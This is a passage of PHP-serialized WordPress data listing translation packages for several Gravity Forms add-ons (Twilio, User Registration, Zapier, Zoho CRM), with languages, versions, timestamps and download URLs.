Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-12-17T15:07:56+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-11-06T13:28:04+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-11-06T13:28:39+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:31:42+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:31:44+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:28:\"gravityformsuserregistration\";a:1:{s:12:\"translations\";a:21:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:16+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:116:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:56+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-06-27T10:16:26+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-10-11T17:40:17+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-06-27T10:16:33+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-06-27T10:16:36+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:11+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:116:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2019-12-10T13:55:19+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:17:46+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-10-20T10:33:20+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-03-29T19:18:41+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:19+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-11-01T19:35:43+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-03-14T17:59:23+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:116:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:37+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:39+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-10-25T23:17:18+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:18:38+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:07+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-11-04T18:52:12+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:32:51+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:119:\"https://packages.translationspress.com/rocketgenius/gravityformsuserregistration/gravityformsuserregistration-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformszapier\";a:1:{s:12:\"translations\";a:18:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2022-06-27T09:36:35+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:43+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2022-06-27T09:18:29+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2022-06-27T09:18:32+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2022-06-27T09:18:39+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2021-07-23T08:59:30+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:07+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:24+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:26+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:32+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-03-14T18:00:03+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:45+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:47+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2021-07-19T11:08:05+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:52+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2023-01-06T17:33:15+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2021-06-06T19:46:51+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.2.1\";s:7:\"updated\";s:25:\"2021-07-21T22:08:31+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformszapier/gravityformszapier-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:19:\"gravityformszohocrm\";a:1:{s:12:\"translations\";a:18:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:10+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-11-10T14:48:46+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:02:53+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:55:23+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:25+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-10-21T13:38:20+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:14+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:31+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-11-10T14:46:42+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:38+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-14T18:00:41+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:51+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-12-17T15:03:23+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-10-25T23:17:08+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-11-10T14:47:58+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformszohocrm/gravityformszohocrm-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:34:21+00:00\";s:12:\"english_name\";s:15:\"Spanish 